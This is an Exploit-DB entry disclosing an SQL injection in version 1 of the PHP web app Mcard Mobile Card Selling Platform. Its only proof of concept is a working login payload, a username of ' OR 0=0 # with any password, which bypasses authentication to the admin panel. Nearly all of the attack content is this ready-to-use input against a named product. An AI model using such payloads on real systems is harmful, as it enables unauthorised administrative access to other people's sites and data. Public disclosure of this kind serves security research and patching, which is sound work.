Mcard Mobile Card Selling Platform 1 - SQL Injection

EDB-ID:

44733

CVE:

N/A


Author:

L0RD

Type:

webapps


Platform:

PHP

Date:

2018-05-23


# Exploit Title:  # Exploit Title: Mcard Mobile Card Selling Platform 1 - SQL Injection
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15
# Version: 1
# Tested on: Kali linux

# POC 1 :

# Attacker can bypass admin panel authentication
Username : ' OR 0=0 #
Password : anything